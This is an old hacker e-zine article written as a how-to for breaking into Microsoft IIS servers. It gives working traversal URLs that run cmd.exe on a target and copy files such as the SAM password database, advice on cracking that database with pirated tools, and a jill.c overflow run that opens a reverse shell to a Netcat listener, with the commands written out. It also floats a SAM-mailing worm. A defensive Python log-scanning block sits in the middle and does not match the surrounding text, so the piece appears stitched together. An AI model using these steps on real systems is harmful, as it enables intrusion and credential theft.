                    Issue 40 Article 11
 ____________________________________________________
|                                                    |
|          IIS:- Hacking For The Retarded            |
|____________________________________________________|
                                               Snafu

[x--------------------------------------------------x]

This month Bill Gates and his merry team of incompetents have brought joy into the hearts of lamers and script kiddies everywhere, with two brand new administrator-compromising exploits.

The first exploit was discovered by NSFOCUS and is really quite clever; it affects IIS 4.0/5.0. The problem is that when a CGI is run, IIS decodes the request twice. The first time, it decodes the CGI filename to see if it is an executable. Then IIS decodes the request once again to check the CGI parameters, but mistakenly, when the second decode occurs, it doesn't just decode the CGI parameters, it decodes the CGI filename AGAIN. Which means we can sneak our ../../ around the IIS security filters :). We change our ../ to ..%255c because after the initial decoding it will be turned into ..%5c. This will pass the security checks but won't break you out of the webroot; but because the filename is accidentally decoded one more time, ..%5c will be turned into ../ and, tada!
Here's the actual exploit URL:

  http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

This will show you the contents of C:\ and will look something like this:

 Directory of c:\

01/11/00  09:38a        <DIR>          Backup
08/27/97  04:09p        <DIR>          bat
02/08/00  06:33a        <DIR>          dpt
07/25/97  03:02p        <DIR>          ExecSoft
07/25/97  07:53p        <DIR>          InetPub
12/06/99  12:26p        <DIR>          malafont
03/21/98  12:41p        <DIR>          MSSQL
08/20/97  08:47a        <DIR>          NM
10/02/98  02:09p        <DIR>          Program Files
08/11/98  02:31p                 8,168 SMSSETUP.LOG
05/25/01  09:03a        <DIR>          TEMP
07/26/97  12:06p        <DIR>          W3MB
03/08/01  05:42p        <DIR>          webdocs
07/28/97  03:15p        <DIR>          webtrend
05/26/01  03:00a        <DIR>          WINNT
              15 File(s)          8,168 bytes
                             120,239,616 bytes free

If we want to download a file then we must do:

  http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\blah.txt

That will copy blah.txt to www.target.com/scripts/blah.txt, where you can download the file. But before you go out and "http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\WINNT\REPAIR\SAM" everything in sight, you must know that you can only run commands as IUSR_machinename. Which is shit, basically: you can copy most stuff that's in Inetpub normally, and most stuff on C:\, but if you are really lucky you might be able to copy the SAM to your web directory (1 in 20 chance, I would say). Once you've got the SAM you can download l0phtcrack from http://www.securitysoftwaretech.com and run a SAM audit on it. You are probably gonna need to brute it for a couple of days if you wanna get the Admin password. There are cracks available for l0phtcrack on DALnet if your trial period has expired; I have no problems with cracking l0pht software as they are no longer working for the underground :(. There's a couple of perl scripts available here http://www.packetstorm.securify.com/filedesc/sensedecode.html, but I really don't see any use for them; this is pretty straightforward through your browser. Mind you, I think you can scan IP blocks with these.
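The double-decode behaviour described above, modelled in code so you can see exactly why a filter that decodes the path once lets ..%255c through, together with a log check an admin can run over IIS-style access logs. This is an added example written for this article, not code from NSFOCUS or from IIS itself; the filter functions are a simplified model of the check the article describes, the log format is a cut-down W3C layout, and all log lines are constructed samples.

```python
# Added example: model of the IIS double-decode bug and a detector for it.
# Not IIS code; the filter below is a simplified stand-in for the real check.
from typing import List, Optional, Tuple
from urllib.parse import unquote

TRAVERSAL = "../"


def _slashes(path: str) -> str:
    """Treat backslash and forward slash alike, as Windows does."""
    return path.replace("\\", "/")


def single_decode_filter(path: str) -> bool:
    """Model of the pre-patch check: decode ONCE, then look for traversal.
    Returns True if the path is allowed through."""
    return TRAVERSAL not in _slashes(unquote(path))


def second_decode(path: str) -> str:
    """Model of what happened to the CGI filename afterwards: a second decode."""
    return unquote(unquote(path))


def canonical_decode(path: str, max_rounds: int = 8) -> Optional[str]:
    """Hardened approach: decode until the string stops changing.
    Returns None if it never stabilises (reject such input outright)."""
    cur = path
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            return cur
        cur = nxt
    return None


def canonical_filter(path: str) -> bool:
    """Check traversal on the fully decoded form, not on a single decode."""
    canon = canonical_decode(path)
    if canon is None:
        return False
    return TRAVERSAL not in _slashes(canon)


def classify(path: str) -> Optional[str]:
    """Label a request path for log review, or None if nothing is wrong."""
    canon = canonical_decode(path)
    if canon is None:
        return "decode-never-stabilised"
    if TRAVERSAL in _slashes(canon):
        # Traversal that only appears after more than one decode is the
        # evasion this article describes; plain traversal is still traversal.
        if TRAVERSAL not in _slashes(unquote(path)):
            return "double-encoded-traversal"
        return "traversal"
    return None


# Constructed sample log (cut-down W3C fields: date time c-ip cs-method
# cs-uri-stem cs-uri-query sc-status). Not taken from any real server.
SAMPLE_LOG = """
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-16 03:12:44 10.0.0.5 GET /default.htm - 200
2001-05-16 03:12:51 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-16 03:13:02 10.0.0.9 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir 404
2001-05-16 03:13:10 10.0.0.5 GET /images/logo%2520final.gif - 200
"""


def scan_log(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, uri_stem, verdict) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0].startswith("#"):
            continue  # blank line or W3C directive line
        client_ip, uri_stem = fields[2], fields[4]
        verdict = classify(uri_stem)
        if verdict:
            hits.append((client_ip, uri_stem, verdict))
    return hits


if __name__ == "__main__":
    evil = "/scripts/..%255c..%255cwinnt/system32/cmd.exe"
    print("single-decode filter allows it:", single_decode_filter(evil))
    print("what the filename became:      ", second_decode(evil))
    print("canonical filter allows it:    ", canonical_filter(evil))
    for ip, stem, why in scan_log(SAMPLE_LOG):
        print(ip, stem, why)
```

The key line is in canonical_decode: decode until nothing changes, then check. A request that still changes after several rounds is rejected rather than guessed at. The logo%2520final.gif line shows why the detector keys on traversal after full decoding rather than on any %25 at all: double-encoded input is odd but not by itself an attack.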
The second exploit for this month was discovered by eEye, which means it's lame as fuck and blatantly obvious. eEye are the biggest bunch of pricks ever; don't ever believe the shit you read about them being supa 1337 uberhaX0rz. It's all hype and bullshit. If you need any proof of this then please visit http://www.attrition.org/mirror/attrition/2000/12/15/www.eeye.com. This exploit has only been released to plug their new product SecureIIS, which is shit and buggy as fuck anyway: http://neworder.box.sk/showme.php3?id=4718. The exploit however is nowhere near as clever as the previous one and therefore eEye need not take any credit for it. It's a basic buffer overflow in an ISAPI extension on IIS 5 running on Win2k. The offending overflow is in an extension for the Internet Printing Protocol (IPP). IPP is for remote printing and shit over HTTP, so all web servers running this extension unpatched are vulnerable. Originally, when eEye released the exploit, the proof-of-concept code that was released with it didn't compromise anything; in fact it just made a plug for the SecureIIS software on the victim's server. 31337!!! But within days people modified the shellcode to make the exploit a little more serious. The first one released was jill.c. This is quite a nice piece of code: it overflows the extension, then the shellcode makes the victim server connect back to your terminal on the port you specify, connecting to Netcat running on your machine, thus creating a reverse shell. You control the remote machine as if you were sat at it. You can download Netcat for Windows from http://www.securitysoftwaretech.com. To get Netcat running, type this at your command prompt: 'nc -l -p 80 -vv'. It should look like this:

C:\WINDOWS>cd C:\netcat
C:\netcat>nc -l -p 80 -vv
listening on [any] 80 ...
Then you need to run jill with these parameters; it should look something like this:

./jill bnp.org.uk 80 213.20.34.89 80

OK, you can download the C code for the jill variation of the exploit, written by dark spyrit, from http://www.packetstorm.securify.com/filedesc/jill.c.html. Just compile and run it on your shell. Pretty straightforward stuff. Once you've got a command prompt you can run shit as Local System. That means you are the king of the castle and can do almost anything. It's probably not worth retrieving the SAM, cos once the admin realises they got hacked they will probably change all the passwords on the system anyway. Perhaps if you created a worm to mail you the SAM on a certain date then you might be able to work around it; it wouldn't be too hard to create something like that. Or you could simply steal the SAM straight away and use the admin account to log in and do your deeds instead of the exploit. I dunno, depends what's best for the situation; in fact they might not even have 21 or 23 open, so you would be forced to use the exploit. Anyway, it's all common sense at the end of the day. There you go, piece of piss hacking.

Shoutz: NSFOCUS, dark spyrit, solidox, F_S, Phreakazoid, TheMalice, ^Nitr8^, Cheezy (for running through this for me), crypt, F3, Goblinz, Juliet, DaSpikey1, MuNkAy, biohazard, rehack, odysseus, thedohboy, WickedWolf, UnInViTeD, tikka, SWAP, lohap, DavieB, MoRSDeo, and finally my idol, my god McHammer, for giving me all the inspiration and love needed to produce this file.

Stop . . . . . . . . . . Hammertime

[HammerOut]